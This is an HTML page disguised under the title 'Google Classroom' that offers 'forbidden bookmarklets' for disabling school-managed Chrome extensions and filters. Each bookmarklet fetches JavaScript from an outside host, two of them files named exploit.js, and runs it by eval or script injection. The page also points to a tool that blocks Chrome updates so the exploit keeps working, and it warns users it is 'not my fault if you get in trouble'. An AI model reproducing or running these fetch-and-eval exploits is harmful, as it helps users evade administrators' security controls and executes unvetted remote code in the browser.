<html>
    <head>
        <title>Google Classroom</title>
        <link rel="stylesheet" type="text/css" href="style.css">
        <link rel="icon" type="image/x-icon" href="https://visualpharm.com/assets/356/Google%20Classroom-595b40b65ba036ed117d4179.svg" />

        <style>
            body {
                background-image: url("images/black.jpg");
                background-size:cover;
                font-size: 25px;
                font-weight: bold;
                color: white;
                font-family: Arial;



            }
            
            h1 {
                font-size: 100px;
                font-weight: bold;
                color: blue;
                font-family: Arial;
                text-align: center;
                padding-top: 15px;
                padding-bottom: 15 px;
                border-color: white;


            }
            
            body span { 
                     background-color: blue; 
            }
        </style>
    </head>
    
    
    <body>
        
        
        
        
        <div id="block-one">
            <h1>THE FORBIDDEN BOOKMARKLETS</h1>
            <p style="text-align:center;"><img src="https://codehs.com/uploads/99bd47c82230c78f056e7c917b818c74" alt="Logo"></p>
            <p style="text-align:center;"> <a href = "https://sneslover22.github.io/Mathews-Collection" target="top">Home</a>

            
        </div>
        <div id="block-blue">
        <p style="text-align:center;">Welcome to the site!</p>
        <p style="text-align:center;">This is a sub site with 'forbidden' BOOKMARKLETS</p>
        <p style="text-align:center;">⚠ WARNING: NOT MY FAULT IF YOU GET IN TROUBLE ⚠</p>
        <p style="text-align:center;">If they don't automatically pop up, go to chrome.google.com/webstoreX and then click them</p>
        <p style="text-align:center;">Also, any chrome version above 106 won't work. .</p>
        <p style="text-align:center;"><a href="https://snescraft.me/Mathews-Collection/CAUB.html">HERE</a> is the Chrome Automatic Upgrade Blocker</p>
        <p> </p>
        </div>
        <div id="cool-font">
          Phantom
        </div>
        <div>
            <p>These mainly turn off extensions. Phantom is one of them.</p>
            <p>javascript:void fetch(`https://raw.githubusercontent.com/3kh0/ext-remover/main/exploit.js`).then(d=>d.text()).then(eval);</p>
        </div>
        <div id="cool-font">
          LTBEEF OG
        </div>
        <div>
            <p>As the previous one, it unblocks shit.</p>
            <p>javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});</p>
        </div>
        <div id="cool-font">
          Ingot 1
        </div>
        <div>
            <p>Version 1 of ingot</p>
            <p>javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())</p>
        </div>
        <div id="cool-font">
          Ingot 2.0
        </div>
        <div>
            <p>Version 2.0 if ingot</p>
            <p>javascript:(function(){document.head.appendChild(document.createElement('script')).src='https://cdn.jsdelivr.net/gh/thegreatestgiant/ingot-2.0@main/ingot2.0.js'})()</p>
        </div>
        <div id="cool-font">
          CompactCow GUI (Ingot) (Possibly Broken)
        </div>
        <div>
            <p>um idk</p>
            <p>ima put the link here instead since it glitched out.</p>
            <p style="text-align:center;"> <a href = "https://github.com/SnesLover22/Mathews-Collection/blob/main/thing.js" target="top">Code</a></p>
        </div>
    </body>    

</html>
